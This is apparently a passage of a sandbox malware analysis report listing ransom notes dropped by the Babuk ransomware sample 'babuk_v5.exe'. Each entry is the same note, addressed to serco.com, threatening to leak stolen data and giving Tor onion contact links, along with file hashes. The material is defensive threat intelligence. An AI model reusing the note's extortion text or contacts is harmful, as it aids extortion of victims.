                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-DO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-EC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-GT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-HN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-MX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-NI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-SV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-US\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-UY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-VE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\et-EE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\eu-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fa-IR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
